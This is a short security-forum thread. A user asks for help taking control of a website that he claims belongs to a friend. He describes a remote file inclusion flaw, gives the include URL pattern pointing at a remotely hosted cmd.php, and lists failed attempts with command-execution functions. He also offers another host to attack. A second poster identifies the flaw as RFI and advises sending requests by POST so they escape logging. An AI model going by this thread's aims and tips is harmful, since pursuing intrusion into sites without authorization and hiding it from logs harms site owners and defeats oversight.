Waraxe IT Security Portal

tux · Beginner

hi all,
first of all i gotta say, that i've been visiting and reading these forums regulary for some time now. and i really learned a lot. thank you all for this.
now i got a problem. there is a website i want to get control of, running phpbb 2.0.18, disallowing html, etc. so there is no actual possibility to exploit the forum software, as well as any other remotely-accessible software installed on this host (to my knowledge). but i discovered something else, very interesting.
i can call a php-script (not related to phpbb) and get to display remote webpages/-apps inside the mainsite. it's no iframe or anything alike, but poorly written php (i must admit, i don't think i would have made it any better...). of course i tried to exploit this misbehaviour by calling a script from a remote host to execute commands on the target host. without luck.
the url looks like this: http://xxx.de/?seite=http://yyy.de/cmd.php
i tried every possible combination via passthru(), exec(), system() etc. in the cmd.* file, but it parses the php file on the remote host and displays the output on the target host. when changing the file to *.txt or *.gif or whatever, there is no output at all. also nesting php tags inside the php tags shows no difference.
i am really lost and definately want to succeed. its a friends site i want to have some 'polite' fun with. i really don't want to destroy things or whatever.
i already succeeded with this method elsewhere, but this one is quite important for me Wink

if there is anyone who could help me out, like pointing me into the right direction, that would be great!
thanks in advance and please excuse my english, since im german. curious and willing to learn. pls help me with this one. i am even willing to name you a host you could have a lot of fun with (more or less - who knows).

philipp

daemon_azazel · Regular user

show up the vulnerable php script source and i will tell you
what's that about. so far i understood you found some RFI?

btw, don't use GET - this got logged and you may experience
some issues later... allways use POST - much wise i can tell you.

tux · Beginner

yes. i think you're right. this seems to be a remote file inclusion vulnerability. sorry for posting in the wrong forum then.
now i don't know the source code of this php script. it seems to be written by himself. so is there a way to get the code without asking him to show me?

thank you for trying to help!

regards
philipp

daemon_azazel · Regular user

well so you don't know the source...

and how did you noticed this?